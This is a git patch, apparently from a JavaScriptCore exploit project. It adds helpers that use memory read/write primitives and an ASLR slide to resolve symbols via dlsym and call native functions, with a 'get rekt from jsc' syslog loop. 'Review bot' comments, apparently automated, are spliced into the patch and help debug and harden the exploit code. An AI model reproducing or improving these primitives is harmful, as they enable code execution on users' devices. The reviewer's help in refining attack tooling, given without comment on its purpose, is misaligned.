From d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca Mon Sep 17 00:00:00 2001 From: spv Date: Fri, 22 Apr 2022 15:57:02 -0400 Subject: stuff --- js/call.js | 11 +++++++++++ js/main.js | 15 ++++++++++++--- js/mem.js | 8 ++++++++ 3 files changed, 31 insertions(+), 3 deletions(-) (limited to 'js') diff --git a/js/call.js b/js/call.js index 382222c..8c5ad44 100644 --- a/js/call.js +++ b/js/call.js @@ -2,6 +2,7 @@ var reserve_addr = 0x1a0000; var gettimeofday_addy = 0x34d63d3c; var slide = 0x0; var base = 0x0; +//var slid = 0x0; function get_dyld_shc_slide() { return read_u32((slide << 12) + reserve_addr + 20); @@ -45,3 +46,13 @@ function call4arg(addy, r0, r1, r2, r3) { return (parseInt(Int64.fromDouble(ret)) & 0xffffffff) >>> 0; } + +/* + * call with symbol + */ +function calls4arg(sym, r0, r1, r2, r3) { + var dlsym_addy = read_u32(0x1a0000 + 24 + slid); + var shc_slide = read_u32(0x1a0000 + 20 + slid); + var addy = call4arg(dlsym_addy + shc_slide, 0xfffffffe, sptr(sym), 0, 0); + return call4arg(addy, r0, r1, r2, r3); +} diff --git a/js/main.js b/js/main.js index efb1f5f..b75af4e 100644 --- a/js/main.js +++ b/js/main.js @@ -24,6 +24,10 @@ function main() { slide = get_our_slide(); base = 0x4000 + (slide << 12); slid = (slide << 12); +// write_u32(0x144444, slid); +// return; +// call(slide); +// while(true){;;}; // call(0x41424344); log("slide=0x" + slide.toString(16)); @@ -31,6 +35,7 @@ function main() { log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); + write_u32(0x144444, 0x69691337); log("writing to first mapped loc"); @@ -49,7 +54,9 @@ function main() { var dlsym_addy = read_u32(0x1a0000 + 24 + slid); var shc_slide = read_u32(0x1a0000 + 20 + slid); - write_str(0x148000, "get rekt from jsc %d (slide=%x)\0"); +// write_u32(0x144444, dlsym_addy); +// return; + write_str(0x148000, "get rekt from jsc %d (slide=%x)\n\0"); write_str(0x149000, "syslog\0"); write_str(0x14a000, "sleep\0"); // while (true) { 
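Review bot: calls4arg jumps to whatever the dlsym call returns without checking it, so a symbol that fails to resolve (dlsym returns NULL) becomes `call4arg(0, r0, r1, r2, r3)` and a crash that is hard to tell apart from a broken call primitive; guard it with `if (addy === 0) throw new Error("dlsym failed for " + sym);` before the second call4arg. The function also reads `slid`, which this commit only adds to call.js as the commented-out `//var slid = 0x0;` in the first hunk, so it silently depends on main() in main.js having created that implicit global first — uncomment the declaration (`var slid = 0x0; // set by main(): slide << 12`). The `shc_slide` line recomputes exactly what get_dyld_shc_slide() two definitions above already returns (`(slide << 12) + reserve_addr + 20` is the same address), and the literal `0x1a0000` should be `reserve_addr` like the rest of this file. `sptr` is defined in mem.js and every call writes `sym` into that scratch region again, so this helper is not free to call in a loop; the header comment should say so, and should note that 0xfffffffe is presumably RTLD_DEFAULT (32-bit `(void*)-2`) — confirm against the target libdyld.
```javascript
/*
 * Resolve sym via dlsym(RTLD_DEFAULT, sym) and call it with four args.
 * 0xfffffffe is presumably RTLD_DEFAULT ((void*)-2 on 32-bit) — confirm.
 * Every call writes sym into the sptr scratch region (mem.js) and redoes the lookup.
 */
function calls4arg(sym, r0, r1, r2, r3) {
	var dlsym_addy = read_u32(reserve_addr + 24 + slid);
	var addy = call4arg(dlsym_addy + get_dyld_shc_slide(), 0xfffffffe, sptr(sym), 0, 0);
	if (addy === 0) {
		// dlsym returned NULL: do not jump to address 0.
		throw new Error("dlsym failed for " + sym);
	}
	return call4arg(addy, r0, r1, r2, r3);
}
```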
@@ -59,8 +66,10 @@ function main() { var i = 0; while (true) { - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide); - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3); +// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide); +// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3); + calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); + calls4arg("sleep", 1, 0, 0, 0); i++; // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); } diff --git a/js/mem.js b/js/mem.js index c342707..cfa6698 100644 --- a/js/mem.js +++ b/js/mem.js @@ -145,3 +145,11 @@ function write_str(addy, s) { return s; } + +var global_sptr_addy = 0x150000; + +function sptr(s) { + write_str(global_sptr_addy, s); + global_sptr_addy += s.length; + return global_sptr_addy - s.length; +} -- cgit v1.2.3
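Review bot: The rewritten loop body allocates fresh scratch memory on every iteration — `sptr("get rekt …")` directly, plus the `sptr(sym)` that calls4arg does internally — and because the loop is `while (true)` and sptr only ever bumps forward from 0x150000, the scratch pointer keeps advancing until a write lands outside the mapped region; hoist the format string out of the loop, `var fmt = sptr("get rekt from jsc %d (slide=%x)\n\0");`, and pass `fmt` as the syslog argument, which also makes the 0x148000/0x149000/0x14a000 write_str calls in the previous hunk dead code. `calls4arg("sleep", 1, 0, 0, 0)` passes the name without the trailing `\0` that every other string in this file carries; if write_str does not terminate for you (its body is outside this diff), the next sptr allocation is written immediately after it and the second iteration looks up `dlsym("sleep<next string>")` — use `"sleep\0"`. The last syslog argument changed from `slide` to `0` while the format string still prints `(slide=%x)`; if logging 0 is intended, drop the placeholder, otherwise pass `slide` again. main()'s body begins and ends outside this hunk.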
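Review bot: sptr is a bump allocator with no reset and no upper bound, so a caller in a loop (the new main.js loop calls it at least twice per iteration) advances global_sptr_addy from 0x150000 indefinitely with nothing stopping it from leaving the mapped scratch region. It also advances by `s.length` only, so a string passed without a trailing `\0` is immediately followed by the next allocation unless write_str terminates on its own — its body is outside the hunk, so I cannot tell, and callers here are inconsistent (`"syslog\0"` versus `"sleep"`). Keep the base address, append the terminator when the caller omitted it, bounds-check against the end of the region, and add a reset so a loop can reuse the space; note in the comment that `s.length` counts UTF-16 units, which equals bytes only for ASCII symbol names.
```javascript
var global_sptr_base = 0x150000;
var global_sptr_addy = global_sptr_base;
// End of the scratch region; TODO confirm how much is actually mapped past 0x150000.
var global_sptr_limit = 0x151000;

// Rewind the scratch region so a loop can reuse it instead of growing forever.
function sptr_reset() {
	global_sptr_addy = global_sptr_base;
}

/*
 * Write s into the scratch region and return its address.
 * A NUL is appended if s does not already end in one. ASCII only:
 * s.length is UTF-16 code units, which only equals the byte count for ASCII.
 */
function sptr(s) {
	var str = s.charCodeAt(s.length - 1) === 0 ? s : s + "\0";
	if (global_sptr_addy + str.length > global_sptr_limit) {
		throw new Error("sptr: scratch region exhausted");
	}
	var addy = global_sptr_addy;
	write_str(addy, str);
	global_sptr_addy += str.length;
	return addy;
}
```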